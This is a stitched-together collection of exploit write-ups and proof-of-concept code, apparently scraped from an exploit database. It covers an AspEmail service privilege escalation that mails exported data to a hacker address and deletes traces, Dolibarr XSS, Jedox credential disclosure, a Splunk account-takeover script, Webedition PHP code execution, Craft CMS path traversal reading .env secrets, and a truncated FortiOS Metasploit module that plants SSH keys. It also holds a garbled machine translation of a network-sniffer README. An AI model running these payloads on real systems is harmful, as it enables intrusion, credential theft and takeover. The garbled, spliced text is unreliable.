commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat"); #
commandLine.Execute(); #
commandLine.ToFile(@"C:\Windows\Temp\"); #
} #
} #
} #
#
# #
####################################################################################################################
# #[Mail.cs]# #
####################################################################################################################
# #
#
using System; #
using System.Net.Mail; #
using System.Net; #
SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com"); #
var mail = new MailMessage(); #
mail.From = new MailAddress("mail@deepseclab.com"); #
mail.To.Add("mail@hacker.com"); #
mail.Subject = "Trigger Successful!"; #
mail.IsBodyHtml = true; #
string htmlBody; #
htmlBody = "<strong>This server has been rebooted.</strong>"; #
mail.Body = htmlBody; #
Attachment attachment; #
attachment = new Attachment(@"C:\Windows\Temp\Export.txt"); #
mail.Attachments.Add(attachment); #
SmtpServer.Port = 587; #
SmtpServer.UseDefaultCredentials = false; #
SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com","p@ssw0rd123"); #
SmtpServer.EnableSsl = true; #
SmtpServer.Timeout = int.MaxValue; #
SmtpServer.Send(mail); #
#
# #
####################################################################################################################
# #[Run.bat]# #
####################################################################################################################
# #
#
whoami > C:\Windows\Temp\Export.txt #
cd C:\Program Files (x86)\Persits Software\AspEmail\Bin #
del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe #
cd c:\Windows\Tasks #
del Run.bat & del Mail.exe #
#
# #
####################################################################################################################
# #
[+]Trigger Successful![+] #
#
[+] C:\PenTest>systeminfo | findstr "Boot Time" #
System Boot Time: 13.04.2022, 07:46:06 #
#
# #
####################################################################################################################
#[Export.txt]# #
####################################################################################################################
# #
#
NT AUTHORITY\SYSTEM #
#
# #
####################################################################################################################
# #
# ==================================================================================================================
# ...|||[FIX]|||... #
# ==================================================================================================================
# [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] #
# =================================================================================================================#
[+] C:\Administrator>sc qc "Persits Software EmailAgent"
[SC] QueryServiceConfig SUCCESS
SERVICE_Name: Persits Software EmailAgent
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_Name : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_Name : Persits Software EmailAgent
DEPENDENCIES : rpcss
SERVICE_START_Name : LocalSystem
# ==================================================================================================================
[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
# ==================================================================================================================
[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
Persits Software EmailAgent
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
# ==================================================================================================================
[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.
DONE!
# ==================================================================================================================
[+] C:\Administrator>sc stop "Persits Software EmailAgent"
[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"
* These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore.
# ==================================================================================================================
# Exploit Title: Dolibarr Version 17.0.1 - Stored XSS
# Dork:
# Date: 2023-08-09
# Exploit Author: Furkan Karaarslan
# Category : Webapps
# Vendor Homepage: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php
# Version: 17.0.1 (REQUIRED)
# Tested on: Windows/Linux
# CVE :
-----------------------------------------------------------------------------
Requests
POST /dolibarr-17.0.1/htdocs/user/note.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 599
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php?action=editnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: 5c8ccd93504819395bd9eb83add769eb=g6sujc3ss8cj53cvk84qv0jgol; f758a1cd0925196cd7746824e3df122b=u04rsmdqgrdpr2kduo49gl0rmh; DOLSESSID_18109f368bbc82f2433d1d6c639db71bb97e2bd1=sud22bsu9sbqqc4bgcloki2eht
Connection: close
token=4b1479ad024e82d298b395bfab9b1916&action=setnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1¬e_public=%3Ca+onscrollend%3Dalert%281%29+style%3D%22display%3Ablock%3Boverflow%3Aauto%3Bborder%3A1px+dashed%3Bwidth%3A500px%3Bheight%3A100px%3B%22%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cspan+id%3Dx%3Etest%3C%2Fspan%3E%3C%2Fa%3E&modify=De%C4%9Fi%C5%9Ftir
# Exploit Title: Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2020.2 (20.2.5) and older
# CVE : CVE-2022-47874
Introduction
=================
Improper access controls in `/tc/rpc` allows remote authenticated users to view details of database connections via the class `com.jedox.etl.mngr.Connections` and the method `getGlobalConnection`. To exploit the vulnerability, the attacker must know the name of the database connection.
Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
Proof of Concept
=================
1) List all available database connections via `conn::ls` (see also: CVE-2022-47879):
PATH: /be/rpc.php
METHOD: POST
BODY:
[
[
"conn",
"ls",
[
null,
false,
true,
[
"type",
"active",
"description"
]
]
]
]
2) Retrieve details of a database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`:
PATH: /tc/rpc
METHOD: POST
BODY:
[
[
"com.jedox.etl.mngr.Connections",
"getGlobalConnection",
[
"<CONNECTION>"
]
]
]
# Exploit Title: MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control
# Date: 2023-04-28
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://millegpg.it/
# Software Homepage: https://millegpg.it - https://millewin.it/prodotti/governo-clinico-3/
# Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe
# Version: 5.9.2
# Tested on: Microsoft Windows 10 Enterprise x64 22H2, build 19045.2913
# CVE: CVE-2023-25438
MilleGPG / MilleGPG5 also known as "Governo Clinico 3"
Vendor: Millennium S.r.l. / Dedalus Group - Dedalus Italia S.p.a. / Genomedics S.r.l.
Affected/tested version: MilleGPG5 5.9.2
Summary:
Mille General Practice Governance (MilleGPG): an interactive tool to address an effective quality of care through the
Italian general practice network.
MilleGPG is an innovative IT support for the evaluation and optimization of patient care and intervention processes,
complete with new features for the management of the COVID-19 vaccine campaign. It is An irreplaceable "ally" for the
General Practitioner, also offering contextual access to the most authoritative scientific content and CME training.
Vuln desc:
The application is prone to insecure file/folder permissions on its default installation path, wrongly allowing some
files to be modified by unprivileged users, malicious process and/or threat actor. Attacker can exploit the weakness
abusing the "write" permission of the main application available to all users on the system or network.
Details:
Any low privileged user can elevate their privileges abusing files/folders that have incorrect permissions, e.g.:
C:\Program Files\MilleGPG5\MilleGPG5.exe (main gui application)
C:\Program Files\MilleGPG5\plugin\ (GPGCommand.exe, nginx and php files)
C:\Program Files\MilleGPG5\k-platform\ (api and webapp files)
such as BUILTIN\Users:(I)(OI)(CI)(R,W) and/or FILE_GENERIC_WRITE, FILE_WRITE_DATA and FILE_WRITE_EA
#!/usr/bin/env python3
#
# Exploit Title: Splunk 9.0.5 - admin account take over
# Author: [Redway Security](https://twitter.com/redwaysec))
# Discovery: [Santiago Lopez](https://twitter.com/santi_lopezz99)
#CVE: CVE-2023-32707
# Vendor Description: A low-privilege user who holds a role that has the `edit_user` capability assigned
# to it can escalate their privileges to that of the admin user by providing specially crafted web requests.
#
# Versions Affected: Splunk Enterprise **below** 9.0.5, 8.2.11, and 8.1.14.
#
import argparse
import requests
import random
import string
import base64
# ignore warnings
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Parse command-line arguments
parser = argparse.ArgumentParser(description='Splunk Authentication')
parser.add_argument('--host', required=True, help='Splunk host or IP address')
parser.add_argument('--username', required=True, help='Splunk username')
parser.add_argument('--password', required=True, help='Splunk password')
parser.add_argument('--target-user', required=True, help='Target user')
parser.add_argument('--force-exploit', action='store_true',
help='Force exploit')
args = parser.parse_args()
# Splunk server settings
splunk_host = args.host.split(':')[0]
splunk_username = args.username
splunk_password = args.password
target_user = args.target_user
force_exploit = args.force_exploit
splunk_port = args.host.split(':')[1] if len(args.host.split(':')) > 1 else 8089
user_endpoint = f"https://{splunk_host}:{splunk_port}/services/authentication/users"
credentials = f"{splunk_username}:{splunk_password}"
base64_credentials = base64.b64encode(credentials.encode()).decode()
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0',
'Authorization': f'Basic {base64_credentials}'
}
proxies = {
# 'http': '[http://127.0.0.1:8080'](<a href=),">http://127.0.0.1:8080',
# 'https': 'http://127.0.0.1:8080'
}
response = requests.get(f"{user_endpoint}/{splunk_username}?output_mode=json",
headers=headers, proxies=proxies, verify=False)
if response.status_code == 200:
affected_versions = ['9.0.4', '8.2.10', '8.1.13']
user = response.json()
splunk_version = user['generator']['version']
# This is not a good way to compare versions.
# There is a range of versions that are affected by this CVE, but this is just a PoC
# 8.1.0 to 8.1.13
# 8.2.0 to 8.2.10
# 9.0.0 to 9.0.4
print(f"Detected Splunk version '{splunk_version}'")
if any(splunk_version <= value for value in affected_versions) or force_exploit:
user_capabilities = user['entry'][0]['content']['capabilities']
if 'edit_user' in user_capabilities:
print(
f"User '{splunk_username}' has the 'edit_user' capability, which would make this target exploitable.")
new_password = ''.join(random.choice(
string.ascii_letters + string.digits) for _ in range(8))
change_password_payload = {
'password': new_password,
'force-change-pass': 0,
'locked-out': 0
}
response = requests.post(f"{user_endpoint}/{target_user}?output_mode=json",
data=change_password_payload, headers=headers, proxies=proxies, verify=False)
if response.status_code == 200:
print(
f"Successfully taken over user '{target_user}', log into Splunk with the password '{new_password}'")
else:
print('Account takeover failed')
else:
print(
f"User '{splunk_username}' does not have the 'edit_user' capability, which makes this target not exploitable by this user.")
else:
print(f"Splunk version '{splunk_version}' is not affected by CVE-2023-32707")
else:
print(
f"Couldn't authenticate to Splunk server '{splunk_host}' with user '{splunk_username}' and password '{splunk_password}'")
exit(1)
Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Application: webedition Cms
Version: v2.9.8.8
Bugs: RCE
Technology: PHP
Vendor URL: https://www.webedition.org/
Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
Date of found: 03.08.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps
1. Login account
2. Go to New -> Webedition page -> empty page
3. Select php
4. Set as "><?php echo system("cat /etc/passwd");?> Description area
Poc request:
POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1
Host: localhost
Content-Length: 1621
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300
Connection: close
we_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1
# Exploit Title: Ethercreative Logs 3.0.3 - Path Traversal
# Date: 2022.01.26
# Exploit Author: Steffen Rogge, SC
# Vendor Homepage: https://github.com/ethercreative/logs
# Software Link: https://plugins.craftcms.com/logs
# Version: <=3.0.3
# Tested on: Linux
# CVE : CVE-2022-23409
product: Ethercreative Logs plugin for Craft CMS
fixed version: >=3.0.4
impact: Medium
found: 2021-07-06
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos company
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"A quick and dirty way to access your logs from inside the CP"
As found on the plugin store page: https://plugins.craftcms.com/logs
Active Installs 4,093 (as of 2021-07-07)
Business recommendation:
------------------------
The vendor provides a patched version v3.0.4 which should be installed immediately.
Vulnerability overview/description:
-----------------------------------
1) Authenticated Path Traversal (CVE-2022-23409)
The plugin "Logs" provides a functionality to read log files of the Craft CMS system inside
the backend of the CMS. As the requested logfile is not properly validated, an attacker is
able to request arbitrary files from the underlying file system with the permissions of the
web service user.
Proof of concept:
-----------------
1) Authenticated Path Traversal (CVE-2022-23409)
As the plugin is installed as an administrator of the system and the function is only accessible
after being logged in as an admin, an attacker needs to be authenticated as an administrator in
the backend in order to extract the needed "{MD5}_identity" cookie for the crafted request.
The vulnerable endpoint is provided by the plugin under the following path:
https://vulnerablesite.com/index.php/admin/actions/logs/logs/stream
The vulnerable controller for that endpoint can be found here:
https://github.com/ethercreative/logs/blob/master/src/Controller.php
The function "actionStream()" provides an endpoint for the Craft CMS and does not validate input
values before file content is being read by the function "file_get_contents".
public function actionStream ()
{
$logsDir = \Craft::getAlias('@storage/logs');
$logFile = \Craft::$app->request->getParam('log');
$currentLog = \Craft::$app->request->get('log', $logFile);
$log = file_get_contents($logsDir . '/' . $currentLog);
exit($log);
}
A crafted GET parameter with the name "log" can be used to access files on the underlying filesystem
with rights as the user executing the web server. In most cases this will be the user "www-data".
In order to read the file ".env" or ".env.php" which contains the environment configuration and as
such also the database credentials, the following request can be used:
GET /admin/actions/logs/logs/stream?log=../../.env HTTP/1.1
Host: <host>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Connection: close
Cookie: 1031b8c41dfff97a311a7ac99863bdc5_identity=<identity_cookie>;
The response then discloses the file content of the file ".env":
HTTP/1.1 200 OK
Date: Thu, 07 Jul 2021 10:08:52 GMT
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: CraftSessionId=2uisculfj8t9q1tnbiukl6ogjf; path=/; secure; HttpOnly
Content-Length: 1600
Connection: close
[...]
$craftEnvVars = [
'DB_DRIVER' => 'mysql',
'DB_SERVER' => '********',
'DB_USER' => '********',
'DB_PASSWORD' => '********',
'DB_DATABASE' => '********',
'DB_SCHEMA' => 'public',
'DB_TABLE_PREFIX' => '',
'DB_PORT' => '********',
'SECURITY_KEY' => '********',
[...]
Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the latest version available at the time
of the test:
* Version 3.0.3 released on November 25, 2019
Distributed through the Craft Plugin Store https://plugins.craftcms.com/logs
Vendor contact timeline:
------------------------
2021-07-07: Contacting vendor through dev@ethercreative.co.uk
2021-07-08: Response from vendor, no encryption available but vendor accepted to be responsible
for any risks involved with plaintext communication
2021-07-08: Advisory was sent to vendor unencrypted
2021-07-09: Vendor released a patch for this vulnerability with version 3.0.4
(https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4)
2021-07-12: Updated Plugin has been tested on an up-to-date CraftCMS installation
(CraftCMS 3.7.0, PHP 8, MySQL 8, Logs Plugin 3.0.4)
2022-01-24: Release of security advisory
Solution:
---------
The vendor released a patched version 3.0.4 or higher which can be retrieved from their
website/github:
https://plugins.craftcms.com/logs
https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4
Workaround:
-----------
Uninstall/Disable the plugin and access the Craft CMS logs via SSH or other services.
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult, an Atos company
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos company. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Steffen Rogge / @2022
无形协议嗅探器,用于在网络中查找漏洞。专为penters和安全工程师而设计。
以上:隐形网络协议sniffer
专为五旬节和安全工程师设计
作者: Magama Bazarov,[电子邮件保护]
假名:施法者
版本: 2.6
CodEname:内向
免责声明
此存储库中包含的所有信息仅用于教育和研究目的。作者对此工具的任何非法使用概不负责。
这是一种专门的网络安全工具,可帮助申请人和安全专业人员。
上面的
力学
是一个无形的网络嗅探器,用于在网络设备中找到漏洞。它完全基于网络流量分析,因此不会在空中发出任何噪音。他是看不见的。完全基于Scapy库。
上面允许penters自动化在网络硬件中查找漏洞的过程。发现协议,动态路由,802.1q,ICS协议,FHRP,STP,LLMNR/NBT-NS等
支持的协议
最多检测27个协议:
MacSec(802.1x AE)
EAPOL(检查802.1x版本)
ARP(被动ARP,主机发现)
CDP(思科发现协议)
DTP(动态中继协议)
LLDP(链接层发现协议)
802.1q标签(VLAN)
S7COMM(西门子)
奥隆
TACACS+(终端访问控制器访问控制系统加上)
modbustcp
STP(跨越树协议)
OSPF(首先开放最短路径)
EIGRP(增强的内部网关路由协议)
BGP(边界网关协议)
VRRP(虚拟路由器冗余协议)
HSRP(主机待机冗余协议)
GLBP(网关负载平衡协议)
IGMP(互联网组管理协议)
llmnr(链接本地多播名称分辨率)
NBT-NS(NetBios名称服务)
MDN(多播DNS)
DHCP(动态主机配置协议)
DHCPV6(动态主机配置协议V6)
ICMPV6(Internet控制消息协议V6)
SSDP(简单服务发现协议)
MNDP(Mikrotik邻居发现协议)
操作机构
在两种模式:中工作
热模式:在界面上嗅探指定计时器冷模式:分析流量转储该工具的操作非常简单,并且由参数驱动:
Interface: Specifying the network interface on which sniffing will be performed Timer: Time during which traffic analysis will be performed Input: The tool takes an already prepared .pcap as input and looks for protocols in it Output: Above will record the listened traffic to .pcap file, its name you specify yourself Passive ARP: Detecting hosts in a segment using Passive ARP usage:上面.py [-h] [ - 接口接口] [ - timer Timer] [ - 输出输出] [ - 输入输入] [ - passive-arp]
Options:
-h, - 赫尔普显示此帮助消息和退出
- 接口接口
流量聆听的接口
- 以几秒钟的时间计时器时间以捕获数据包,如果不设置捕获,则无限期运行
- 输出输出文件名,记录流量的位置
- 输入输入文件名称流量转储的名称
-Passive-Arp被动ARP(主机发现)
有关协议的信息
所获得的信息不仅对五个五个人都有用,而且对安全工程师,他还会知道他需要注意的是什么。
上面检测协议时,它会输出必要的信息以指示攻击向量或安全性问题:
Impact:对该协议可以进行哪种攻击;
工具:可以使用哪种工具来启动攻击;
技术信息:所需的五个五旬节,发件人MAC/IP地址,FHRP组ID,OSPF/EIGRP域等的信息
缓解:解决安全问题的建议
源/目标地址:用于协议,以上显示有关源和目标MAC地址和IP地址的信息
安装
Linux
您可以直接从Kali Linux存储库中安装
caster@kali:〜 $ sudo apt更新sudo apt安装上方或.
caster@kali:〜 $ sudo apt-get install python3-scapy python3-colorama python3-stetuptools
Caster@kali:〜 $ git克隆https://github.com/casterbyte/above
Caster@kali:〜 $ cd上方/
caster@kali:〜/上方$ sudo python3 setup.py安装
macOS:
#安装python3首先
酿造安装python3
#然后安装所需的依赖项
sudo pip3安装scapy colorama setuptools
#克隆仓库
git克隆https://github.com/casterbyte/above
CD上方/
sudo python3设置。py安装不要忘记在MacOS上停用防火墙!
设置网络防火墙
如何使用
热模式
需要嗅探根访问
以上可以在有或没有timer:的情况下运行
caster@kali:〜 $ sudo上方- 接口eth0 -timer 120停止流量嗅探,按CTRL +寻
警告!上面的设计并非用于使用隧道界面(L3),因为将过滤器用于L2协议。隧道L3接口上的工具可能无法正常工作。
示例:
Caster@kali:〜 $ sudo上方- 接口eth0 -timer 120
-----------------------------------------------------------------------------------------------------------------------------------------------------------
[+]开始嗅.
[*]检测到协议后- 将显示有关其的所有必要信息
-----------------------------------------------------------------------------
[+]检测到的SSDP数据包
[*]攻击影响: UPNP设备开发的潜力
[*]工具: Evil-SSDP
[*] SSDP源IP: 192.168.0.251
[*] SSDP源MAC: 02:10:DE3:6064:F233:34
[*]缓解措施:确保在所有设备上禁用UPNP,除非绝对必要,请监视UPNP流量
-----------------------------------------------------------------------------
[+]检测到的MDNS包
[*]攻击影响: MDNS欺骗,凭证拦截
[*]工具:响应者
[*] MDNS欺骗专门针对Windows机器的作品
[*]您无法从Apple设备获得NetNTLMV2-SSP
[*] MDNS发言人IP: FE80:3360183F3:301C3:27BD3:543
[*] MDNS演讲者MAC: 02:10:DE333333333333:F233:34
[*]缓解:过滤MDNS流量。小心MDN过滤
--------------------------------------------------------------------------------如果您需要记录流量,请使用- 输出参数
caster@kali:〜 $ sudo上方- 接口eth0 -timer 120-上方。
冷模式
如果您已经有一些记录的流量,则可以使用- 输入参数来寻找潜在的安全问题
caster@kali:〜 $上方- 输入ospf-md5.cap emamexemend:
Caster@kali:〜 $ sudo上方- 输入OSPF-MD5.CAP
[+]分析PCAP文件.
-----------------------------------------------------------------------------
[+]检测到的OSPF数据包
[+]攻击影响:子网发现,黑洞,邪恶的双胞胎
[*]工具: Loki,Scapy,frofrouting
[*] OSPF区域ID: 0.0.0.0
[*] OSPF邻居IP: 10.0.0.1
[*] OSPF邻居MAC: 00:0C:29333333333:4C3:54
[!] authentication: MD5
[*] Bruteforce: Ettercap的工具,开膛手约翰
[*] OSPF密钥ID: 1
[*]缓解:启用被动界面,使用身份验证
-----------------------------------------------------------------------------
[+]检测到的OSPF数据包
[+]攻击影响:子网发现,黑洞,邪恶的双胞胎
[*]工具: Loki,Scapy,frofrouting
[*] OSPF区域ID: 0.0.0.0
[*] OSPF邻居IP: 192.168.0.2
[*] OSPF邻居MAC: 00:0C:2933333333333333333333333:FB
[!] authentication: MD5
[*] Bruteforce: Ettercap的工具,开膛手约翰
[*] OSPF密钥ID: 1
[*]缓解:启用被动界面,使用身份验证
被动arp
该工具可以通过在被动模式下处理ARP帧在空中检测主机
caster@kali:〜 $ sudo上方- 接口eth0 -passive-arp -timer 10
[+]使用被动ARP的主机发现
-----------------------------------------------------------------------------
[+]检测到的ARP回复
[*] ARP回复IP: 192.168.1.88
[*] MAC地址: 00:00:0C33:073:AC:C8
-----------------------------------------------------------------------------
[+]检测到的ARP回复
[*] ARP回复IP: 192.168.1.40
[*] MAC地址: 00:0C3:293:C5333333333333:81
---------------------------------------------------------------------------------------------------------------------------------------------------------------------》(
utro
)我写了此工具,因为Koan Sound的曲目“来自上方的视图(Remix)”。当我从事这个嗅探器时,这首歌对我来说是一切。
# Exploit Title: Fortinet FortiOS, FortiProxy, and FortiSwitchManager 7.2.0 - Authentication bypass
# Date: 2022-10-10
# Exploit Author: Zach Hanley, SC
# Vendor Homepage: https://www.fortinet.com
# Version: 7.0.0
# Tested on: Linux
# CVE : CVE-2022-40684
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::SSH
prepend Msf::Exploit::Remote::AutoCheck
attr_accessor :ssh_socket
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.',
'Description' => %q{
This module exploits an authentication bypass vulnerability
in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API
to gain access to a chosen account. And then add a SSH key to the
authorized_keys file of the chosen account, allowing
to login to the system with the chosen account.
Successful exploitation results in remote code execution.
},
'Author' => [
'Heyder Andrade <@HeyderAndrade>', # Metasploit module
'Zach Hanley <@hacks_zach>', # PoC
],
'References' => [
['CVE', '2022-40684'],
['URL', 'https://www.fortiguard.com/psirt/FG-IR-22-377'],
['URL', 'https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684'],
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2022-10-10', # Vendor advisory
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD],
'Privileged' => true,
'Targets' => [
[
'FortiOS',
{
'DefaultOptions' => {
'PAYLOAD' => 'generic/ssh/interact'
},
'Payload' => {
'Compat' => {
'PayloadType' => 'ssh_interact'
}
}
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
